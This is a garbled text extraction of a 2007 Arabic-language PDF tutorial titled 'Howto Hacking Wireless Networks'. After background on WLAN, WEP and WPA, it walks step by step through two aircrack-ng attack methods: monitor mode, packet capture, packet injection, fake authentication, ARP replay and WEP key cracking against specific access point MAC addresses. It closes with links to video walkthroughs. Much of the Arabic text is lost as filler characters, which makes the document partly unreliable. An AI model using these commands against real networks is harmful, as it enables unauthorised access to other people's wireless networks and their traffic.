howto-hacking wireless networks اختراق الشبكات اللاسلكية ,, الوايرلس
Post on 30-May-2018
295 Views
Preview:
TRANSCRIPT
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
1/33
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
2/33
http://www.t0010.com
2
ProXy-BrokeN####################### Br0ken r0x######################
# Lesson : Howto Hacking Wireless Networks step by step ##Author: BrokeN-ProXy ## Page: www.3asfh.net &www.sniper-sa.com ## Contact Me 0nly email: br0ken.rlz@gmail.com ##Msn Messenger : broken-proxy@hotmail.com ######################## r0x just do it ############### #####
HackingWireless Networks
Copyright #~ BrokeN-ProXy #~ 2007
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
3/33
http://www.t0010.com
3
http://www.3asfh.net/vb/
http://www.sniper-sa.com/forums/
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
T0010.COM
#### php.index/books/com.0010t.www://http
--------------------------------------------------------------
aLT3rEQ$Hacker---------------------------------------------------------------
W
: Adobe Reader
:
html.2readstep/acrobat/products/uk/com.adobe.www://http
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
4/33
http://www.t0010.com
4
WWWW
WARNINGKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
FWLANE
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKWired Equivalent PrivacyWi-Fi Protected Access
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
aircrack-ngKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
wireless toolsKKKKKKKKKKKKKKKKKKK KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK[ Monitor Mode]KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKThe attack method 1KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
The attack method 2KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
5/33
http://www.t0010.com
5
KK Hacking
FFKK
EE
W WWirelessK
WK WK
K
K
KKKKKWARNING
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
6/33
http://www.t0010.com
6
FFFFWLANEEEEWWWW
K
FWLAN \wireless localarea networkEFradiofrequency/RFEK
K
W
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
7/33
http://www.t0010.com
7
JJJJFFFFwireless computer cardsEEEE
K
WWWW
W
PCMCIA
USB
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
8/33
http://www.t0010.com
8
JFaccess pointEW
K
.
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
9/33
http://www.t0010.com
9
W
Institute of Electrical and Electronics Engineers (IEEE)
Internet Engineering Task Force (IETF)
Wireless Ethernet Compatibility Alliance (WECA)
International Telecommunication Union (ITU)
IEEEFE
K
IEEE-
.
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
10/33
http://www.t0010.com
10
.
K)WWAN(W
WWANK
K
WWANF2GEGlobalSystem for Mobile Communications (GSM)Cellular Digital Packet
Data (CDPD)Code Division Multiple Access (CDMA).
KITU.
K)WMAN(Wireless metropolitan area networksW
WMANFE
K
WMANK
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
11/33
http://www.t0010.com
11
WMANK
multichannel multipoint distribution service(MMDS)local multipoint distribution services (LMDS)
IEEE 802.16.
K)WLAN(W
WLANFKE
WLANLAN
K
WLANKWLANFE
KWLANK
.
1997IEEE{WLANKb{
{K
a{.
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
12/33
http://www.t0010.com
12
K)WPAN(Wireless personal area networksW
WPANFPDA
E(POS)POSK
WPANBluetoothKBluetoothK
BluetoothBluetooth
Bluetooth Special Interest Group (SIG)
Bluetooth{KFE.
WPANIEEE{ WPANWPANBluetooth1.0.
{.
WWWWWWWWTeT_TaTWWWW
WLAN=highlight&27438=t?php.threadshow/forum/net.arabhardware.www://http
KKKK
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
13/33
http://www.t0010.com
13
WEP , WPA KK
JWired Equivalent PrivacyW
IEEE
FWired Equivalent PrivacyEWEPK
WEPRC4
64 bitbitK
[Initialization Vector ]IVIVbitRC4 OR 128IVIVK
bitbit
K
RC4IV
RC4IVWEP headerWEPWPAWEPK
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
14/33
http://www.t0010.com
14
JFi Protected Access-WiW
WEP
WPAWi-Fi Protected AccessW
WPA with RADIUS
K
WPA with PSK [pre shared key]
HexadecimalK
TKIPTemporal Key Integrity ProtocolKWEPIVK
Message Integrity CodeARP
Replay AttackWEPIV
IVIV
K
WPADeauthentication Attack
brute force attack
K
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
15/33
http://www.t0010.com
15
KK KAircrack ToolsKAircrack-ng Tools
AircrackK
NETGEAR Or LinksysK
[Chipset]
KAtheros
org.ng-aircrack.www
The best chipset nowadays is Atheros. It is very well supported underLinux, and also under Windows (PCMCIA/CardBus only). Neithersupport any USB wireless devices. The latest madwifi-ng patch makes
it possible to inject raw 802.11 packets in either in Managed andMonitor mode at arbitrary b/g speeds.
aircrack tools
aircrack-ngtools
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
16/33
http://www.t0010.com
16
][chipsetairodumpaireplayK
ChipsetSupported byairodump for
Windows
Supported byairodump for Linux
Supported by aireplayfor Linux
AtherosCardBus: YESPCI: NO (seeCommView)
YESYES (driver patchingrequired)
Atmel UNTESTED802.11b YES802.11g UNTESTED
UNTESTED
BroadcomOld models only(BRCM driver)
YESIN PROGRESS (Forumthread)
Centrino b NOPARTIAL(ipw2100 driverdoesnt discardcorrupted packets)
NO
Centrino b/g NO YESNO (firmware dropsmost packets)ipw2200inject
Centrino a/b/g NO YESNO (See this threadfor alpha injectionsupport.)
Cisco Aironet YES? YES NO (firmware issue)
Hermes I YES YESNO (firmware corrupts
the MAC header)NdisWrapper N/A Never Never
Prism2/3 NO YESYES (PCI and CardBusonly, driver patchingrequired)
PrismGT YESFullMAC: YESSoftMAC: NOT YET
YES (driver patchingrecommended)
Ralink NOYES (rt2500 / rt2570 /rt61 / rt73 driver)
YES, see rt2500,rt2570, rt61 and rt73.Also see Ralinkchipset commentslater on this pager for
important concerns
RTL8180 YES YESUNSTABLE (driverpatching required)
RTL8187L UNTESTEDYES (driver patchingrequired to viewpower levels)
YES (driver patchingrecommended forinjection and requiredto view power levels)
TI(ACX100/ACX111)
NO YESYES (driver patchingrequired)
ZyDAS 1201 NO YESPartially (See patchfor details)
ZyDAS 1211[B] NO YES YESOthers (Marvel...) NO UNKNOWN NO
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
17/33
http://www.t0010.com
17
L
kernel headersgcc
Debian
Ubuntu , Xubuntu , Knoppix ][W
sudo apt-get install build-essential
KKW
wget http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gztar -zxvf aircrack-ng-0.9.1.tar.gzcd aircrack-ng-0.9.1makemake install
Aircrack
KKK
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
18/33
http://www.t0010.com
18
wget
wget http://pcmcia-cs.sourceforge.net/ftp/contrib/wireless_tools.28.tar.gz
tar
tar xvfz wireless_tools.28.tar.gz
cd
cd wireless_tools.28
make
make
make install
make install
iwconfigiwlistFKE
wireless tools
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
19/33
http://www.t0010.com
19
iwlistFwireless toolsE
K
scan all network around
bt ~ # iwlist ath0 scanath0 Scan completed :
Cell 01 - Address: 00:14:7F:1F:27:6DESSID:"SpeedTouch433793"
Mode:Master
Frequency:2.462 GHz (Channel 11)Quality=60/94 Signal level=-35 dBm Noise level=-95 dBmEncryption key:onBit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
12 Mb/s; 48 Mb/sExtra:bcn_int=100
Extra:wme_ie=dd180050f2020101880003a4000027a4000042435e0062322
f00 Cell 02 - Address: 00:18:39:24:5C:F8ESSID:"linksys"Mode:MasterFrequency:2.427 GHz (Channel 4)Quality=50/94 Signal level=-45 dBm Noise level=-95 dBmEncryption key:off
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s48 Mb/s; 54 Mb/s
Extra:bcn_int=100
Extra:wme_ie=dd180050f2020101030003a4000027a4000042435e0062322f00
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
20/33
http://www.t0010.com
20
AircrackMonitorK
sniffingMonitor modeManaged
Monitor ModeW
Wcommand lineKWairmon-ngAircrack
ManagedK
bt~ #iwconfig ath0ath0 IEEE 802.11b ESSID:"" Nickname:""
Mode:Managed Channel:0 Access Point: Not-AssociatedBit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3Retry:off RTS thr:off Fragment thr:off
Encryption key:offPower Management:offLink Quality=0/94 Signal level=-98 dBm Noise level=-98 dBmRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Monitor ModeW
command line
bt~ #ifconfig ath0 downbt~ #wlanconfig ath0 destroybt ~ #wlanconfig ath0 create wlandev wifi0 wlanmode monitorath0bt~ #ifconfig ath0 upbt ~ #iwconfig ath0
ath0 IEEE 802.11b ESSID:"" Nickname:""Mode:Monitor Frequency:2.412 GHz Access Point: 00:0F:B5:EA:2F:AF
[ Monitor Mode ]
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
21/33
http://www.t0010.com
21
Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3Retry:off RTS thr:off Fragment thr:offEncryption key:off
Power Management:offLink Quality=0/94 Signal level=-98 dBm Noise level=-98 dBmRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Wairmon-ngAircrack
bt ~ # airmon-ng stop ath0Interface Chipset Driver
wifi0 Atheros madwifi-ngeth0 Centrino b/g ipw2200ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
bt ~ # airmon-ng start wifi0
Interface Chipset Driver
wifi0 Atheros madwifi-ngeth0 Centrino b/g ipw2200ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor modeenabled)bt ~ # iwconfig ath0ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.457 GHz Access Point: Not-AssociatedBit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3Retry:off RTS thr:off Fragment thr:offEncryption key:offPower Management:offLink Quality=0/94 Signal level=-94 dBm Noise level=-94 dBmRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
WWWWWWWW
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
22/33
http://www.t0010.com
22
MonitorK
interactiveK
W
KKarp
requestivs64 bit{
128 bit{K
The attack method 1
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
23/33
http://www.t0010.com
23
airodump-ng capture packetsaireplay-ng -interactive attack modes [ injection packets]aircrack-ng crack WEP , WPA
airodump-ng)(
airodump-ng c 11 -bssid 00:14:7F:1F:27:6D w capture ath0
-c : channel number --bssid : MAC Address for Access Point -w : save the file capture : file name that be save the packet ath0 : our interface name
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
24/33
http://www.t0010.com
24
Interactiveaireplay-ng)(
interactive
aireplay-ng --interactive b 00:14:7F:1F:27:6D d FF:FF:FF:FF:FF:FF m 68 n68 p 0841 h 00:13:CE:6D:61:59 ath0
--interactive : attack modes -b : MAC Address for Access Point -d : Destination MAC Broadcast -m 68 : minimum Packet length -n 68 : maximum Packet length -p 0841 : Sets the frame control -h : MAC Address for Client ath0 : our interface name
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
25/33
http://www.t0010.com
25
(3) increase the packets
FEFEK
aircrack-ng)4(
aircrack-ng b 00:14:7F:1F:27:6D capture.cap
-b : MAC Address for Access Point capture.cap : capture files
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
26/33
http://www.t0010.com
26
Fake authentication
W
K
FEarp requestarp replay
K
The attack method 2
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
27/33
http://www.t0010.com
27
airmon-ng switch to monitor modeairodump-ng capture packetsaireplay-ng attack modes fake authentication
aireplay-ng attack modes arpreplayaircrack-ng crack WEP , WPA
airodump-ng)(
airodump-ng c 6 -bssid 00:14:6C:1A:98:8C w output ath0
-c : channel number --bssid : MAC Address for Access Point -w : save the file output : file name that be save the packet ath0 : our interface name
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
28/33
http://www.t0010.com
28
fake authenticationaireplay-ng)(
K
aireplay-ng --fakeauth 6000 o 1 q 10 e DataCenter a00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0
--fakeauth : attack modes -o 1 : Send only one set of packets at time -q 10 :Send keep alive packets every 10 seconds -e : Name of Access Point -a : MAC Address for Access Point -h : our MAC Address Card ath0 : our interface name
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
29/33
http://www.t0010.com
29
(3) aireplay-ng arpreplay
arp requestK
aireplay-ng --arpreplay b 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0
--arpreplay : attack modes -b : MAC Address for Access Point -h : our MAC Address Card ath0 : our interface card
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
30/33
http://www.t0010.com
30
(3) increase the packets
FEFEK
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
31/33
http://www.t0010.com
31
aircrack-ng)4(
aircrack-ng b 00:14:6C:1A:98:8C output.cap
-b : MAC Address for Access Point output.cap : capture files
KKKK
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
32/33
http://www.t0010.com
32
K
WAttack-method 1 ( 124 MB )http://www.4shared.com/file/24526019/8831b5f1/attack-
method1part1.html?dirPwdVerified=630ebe35 50MB
http://www.4shared.com/file/24546586/40c72462/attack-method1part2.html?dirPwdVerified=630ebe35 50MB
http://www.4shared.com/file/24548769/ada0b720/attack-method1part3.html?dirPwdVerified=630ebe35 24MB
Attack-method 2 ( 113 MB )
http://www.4shared.com/file/24553904/65b4efa0/attack-method2part1.html?dirPwdVerified=24884433 50MB
http://www.4shared.com/file/24590482/9b931121/attack-method2part2.html?dirPwdVerified=24884433 50MB
http://www.4shared.com/file/24592271/2b86e86d/attack-method2part3.html?dirPwdVerified=24884433 13MB
KKK
""
KKKKK
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
33/33
http://www.t0010.com
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
L
)Sptember 23, 2007(
- --------- --- ---- --- ---- ---- ---
----------------------------------------------------------------
aLT3rEQ$Hacker------------------------------------------------------------------
top related